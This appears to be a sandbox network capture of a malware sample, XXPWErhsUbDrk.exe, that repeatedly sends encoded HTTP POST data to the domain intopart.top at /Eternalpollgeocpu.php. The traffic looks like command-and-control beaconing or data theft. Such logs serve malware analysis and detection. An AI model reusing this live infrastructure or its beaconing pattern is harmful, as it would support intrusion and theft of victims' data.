Apr 29, 2024 01:03:54.289509058 CEST	734	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XaObvm8Ps0l8R%2Fepihgopf%2BA4hBW1DcV1zc396m6i6PK08K7J1JBeYGYd7d8ZCFGM2El9g0wmwcd9yttsApuy0%2FbnMUqqbboSm4J%2Fn%2FIO7QfyKAbH0SMH8d9PZrcAg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab032389503b4-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 23 02 2b 5d 2d 57 2a 54 25 0d 30 32 09 1b 25 3f 20 44 2a 06 2a 44 26 0d 27 05 2d 3d 22 53 24 37 3c 17 22 39 02 12 26 32 20 0f 3f 0e 20 59 02 1c 39 09 26 29 0c 59 31 2d 33 59 3c 0c 00 06 21 2d 3f 02 2a 01 3e 53 24 59 36 04 3c 0a 3a 5b 2b 29 02 56 39 2d 29 5e 27 27 37 1e 3f 25 2c 52 08 13 23 0a 3c 33 34 1c 22 38 30 0c 25 32 26 5f 26 35 30 08 22 06 09 0c 28 00 3c 58 24 22 21 00 26 22 0c 50 39 0a 3f 40 34 3c 25 5b 27 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98#+]-WT%02%? DD&'-="S$7<"9&2 ? Y9&)Y1-3Y<!-?>S$Y6<:[+)V9-)^''7?%,R#<34"80%2&_&50"(<X$"!&"P9?@4<%['-!\/ I4]S
Apr 29, 2024 01:03:54.289530993 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49830	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:54.808810949 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:54.919501066 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:54.919682980 CEST	1080	OUT	Data Raw: 5d 5e 5f 5f 55 5e 5b 52 54 56 50 51 5a 53 51 5a 5b 59 5e 47 54 53 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^__U^[RTVPQZSQZ[Y^GTSPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']%=+#0_16/#'**=+43 ,<%43': Z/!Z/0
Apr 29, 2024 01:03:55.207971096 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FeV4CPE77j1r2Hy41HZGtwH5EBoM10UOh1%2B79r2zHtTXXepNTd%2FVemh%2F%2BKOtm15eITrC2aaUOSsuzO1SAhVBxosArIKWUU62wAFi9unYJsSiBcfeMv6LVTnNGU0uhUA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab037ec4d232a-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:55.208029032 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49831	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:55.441020966 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:55.551093102 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:55.551382065 CEST	1080	OUT	Data Raw: 58 52 5f 5d 50 5a 5b 5f 54 56 50 51 5a 5e 51 54 5b 52 5e 46 54 58 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XR_]PZ[_TVPQZ^QT[R^FTXPB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&>#71,%%^85'>,=*+403#V// #50: Z/!Z/
Apr 29, 2024 01:03:55.933593988 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PGsD%2BHBnDLAztd535FBgIIh7udU4ZVnEMqa24QobaoiaZzYT%2Fuzq4fYXu%2Fo8EabPznYfhFknhMtGCbyhb2vSRvrZkYNV0mFkBGLdMNunSvC1DPycs3FCJ3JVgwlUPyA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab03bddb48133-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:55.933619022 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49832	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:56.189203024 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:03:56.299779892 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:56.299901962 CEST	1076	OUT	Data Raw: 58 52 5a 5f 55 5c 5b 56 54 56 50 51 5a 56 51 5a 5b 53 5e 46 54 52 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XRZ_U\[VTVPQZVQZ[S^FTRPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%[8Z70\&X=[-5Q3=<^=:.?>?V&#//%X #>]'* Z/!Z/
Apr 29, 2024 01:03:56.701553106 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rtIghYoztMnuK4JzqioWSniAhKAESb83EzHVpKGC8MVdFlEo7F5y%2FhIjKMnmXTNUHPLCxIIu6WTfU2PxYqZ%2BTJFRXQ9gJZ8VjsHTbVQYObVPRJhPtuee%2BvpR%2Ff4WaQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0408a4e2b20-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:56.701575994 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:56.701591015 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49833	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:56.956325054 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:57.066886902 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:57.066999912 CEST	1080	OUT	Data Raw: 5d 58 5f 5c 55 5f 5e 51 54 56 50 51 5a 53 51 56 5b 5f 5e 41 54 58 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]X_\U_^QTVPQZSQV[_^ATXP@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%>;4!$\&>6,' _=)2U+>7W$03;=]7-$* Z/!Z/0
Apr 29, 2024 01:03:57.461447001 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5tJ2rWmLcXiCdqi%2Bphw70dPvRBEFbpZnKvQ3h2UbX1NC8jYl2f7M0YEtqekI3AWuzOdgLu0mZAzB8SK2yGbxgZUAQtenK%2Fyl7rcnBx7U2xxDyRvchkGyc4PZU4gNHE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab04559eb224f-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:57.461680889 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49834	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:57.688231945 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:57.798547983 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:57.798777103 CEST	1080	OUT	Data Raw: 5d 5e 5a 5c 55 5d 5b 57 54 56 50 51 5a 55 51 57 5b 5c 5e 47 54 53 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z\U][WTVPQZUQW[\^GTSPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$13#1,]&;%' ^*:++$0,,<!X70&$ Z/!Z/(
Apr 29, 2024 01:03:58.199419022 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52e5FR0lT9Si%2B32sN9%2FPQBBHMcmo85bH6FIIIxfMRrK0orySXWVMhbOF8Uq%2FkRrjFKn6X6oQzl7nhvsUCrat6XKf%2BcbBX4m1p1JkNH2I0t4gXv7QyFqtxHZVkEk8Chw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab049e8e88143-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:58.199462891 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49835	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:58.449156046 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:03:58.559755087 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:58.559880972 CEST	1076	OUT	Data Raw: 58 5e 5f 5f 55 5b 5b 54 54 56 50 51 5a 56 51 50 5b 5c 5e 40 54 5c 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^__U[[TTVPQZVQP[\^@T\PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$13#2^2"/5,$Y9&?=$3;,/&#3$ Z/!Z/(
Apr 29, 2024 01:03:58.839001894 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mj3FhNgqNhKLROowbfdk840UHFcDzO5GXscHha%2Fc2AmWSDLbdAkYzdfbI0SBachHRFN0N%2Fjr8Xx55WB6aYBi%2BBWhzYN2LJjty6s%2B66QrsllAY7oaOUds4Tuxo4zFduU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab04ea8a6aca8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:58.839029074 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49836	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:59.067507029 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:59.177835941 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:59.178149939 CEST	1080	OUT	Data Raw: 58 5c 5a 5e 55 5d 5b 52 54 56 50 51 5a 54 51 50 5b 5b 5e 48 54 58 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\Z^U][RTVPQZTQP[[^HTXPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\&-,\#2%X:/ Q3.8^**)=/W0U//Y=##!' Z/!Z/,
Apr 29, 2024 01:03:59.481829882 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3usHTJddDiQCmZuuIcFtytWg5rjb0Ha4lmUvTmlgdXBMjH%2FuGnBHBoUqE%2BqJaJlnP40r%2BX9iIyczRnlYAigpqgkMa644v9RxLRlnyUwPejYEOatF8NVIir%2BYplSK5rc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0528d032d2a-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:59.481851101 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49837	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:59.410756111 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:59.520783901 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:59.521203995 CEST	1788	OUT	Data Raw: 58 58 5a 5e 55 58 5e 56 54 56 50 51 5a 5e 51 55 5b 5a 5e 46 54 5d 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XXZ^UX^VTVPQZ^QU[Z^FT]PF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%.37$&>;C#3_>:)-008-?> "]' Z/!Z/
Apr 29, 2024 01:03:59.912151098 CEST	734	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WWDMUhdlH7vjowQexDQauYXCq0KMVR3AQZeJRmhta2vUcXZWz%2Bq3SYs6bmpaPoArN8J1pj7St1Y%2FrrXyiRDaYVZ6%2BLuRibC1MzDxiU7uTIUSxT6X38mHh%2B%2BISPpcmrg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab054acd11131-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 10 3f 02 3e 0e 2a 0c 26 50 30 1c 20 0a 31 3c 24 40 3d 01 08 08 26 23 28 16 2f 10 36 50 27 42 2c 19 23 00 2c 59 32 31 2f 1d 3f 0e 20 59 02 1c 3a 1d 32 00 39 02 25 10 2b 5f 28 1c 22 06 35 3e 27 03 2b 2b 22 1a 24 59 25 15 3f 33 03 00 2b 29 05 0e 3a 04 2e 04 31 19 2f 10 3f 1f 2c 52 08 13 23 0b 3f 30 34 54 36 06 16 0c 30 31 3d 04 31 1b 27 52 22 01 28 11 28 00 3c 14 30 0c 04 10 31 32 32 57 2d 55 3c 19 20 5a 2a 00 24 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ?>&P0 1<$@=&#(/6P'B,#,Y21/? Y:29%+_("5>'++"$Y%?3+):.1/?,R#?04T601=1'R"((<0122W-U< Z$-!\/ I4]S
Apr 29, 2024 01:03:59.912199020 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49838	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:59.727946043 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:59.838165998 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:59.838382006 CEST	1080	OUT	Data Raw: 5d 59 5a 5a 55 5d 5b 54 54 56 50 51 5a 54 51 57 5b 58 5e 44 54 5c 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]YZZU][TTVPQZTQW[X^DT\PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1,Z418_1-%_,0V0?)"R(.(338/=X46^0 Z/!Z/,
Apr 29, 2024 01:04:00.262530088 CEST	578	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xF8Z8h0O%2BEqI5Aq6QAp0P045MBeD9L67bWO8qA8rlh810EDHKKoixy2H4HnJBsocorlngMqH5wOSMXxDq%2B3%2BKaOqCT1bgxyxswKYZWg6z0%2By7DLs%2B51%2BCice7MnDAj0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab056abaa124e-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:00.262603998 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49839	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:00.507756948 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:00.618474960 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:00.618757963 CEST	1080	OUT	Data Raw: 58 52 5a 5d 55 57 5b 51 54 56 50 51 5a 55 51 55 5b 5a 5e 45 54 52 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XRZ]UW[QTVPQZUQU[Z^ETRPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1?#0X%.1]/,0>')9=<=/$ 'V,? $* Z/!Z/(
Apr 29, 2024 01:04:00.905810118 CEST	575	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sH5GHVS1PaI5yXWPq1jO6DNIZcQogSN7eq8VxFIBrxyDlSaCBn7p4C29IecZoGM916XUBsCmi53S5eUGn042cEJkL4l4RyffzTcWWry1NknJHxwMxAebi3OIITdHAE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab05b8d782ada-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:00.905838966 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49840	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:01.140768051 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:01.250791073 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:01.251157999 CEST	1080	OUT	Data Raw: 58 53 5f 5d 55 56 5b 56 54 56 50 51 5a 5e 51 53 5b 5c 5e 42 54 5c 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XS_]UV[VTVPQZ^QS[\^BT\PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1[0Z#T$%]-&,3-<X*:2<.#30<;!Z73&$ Z/!Z/
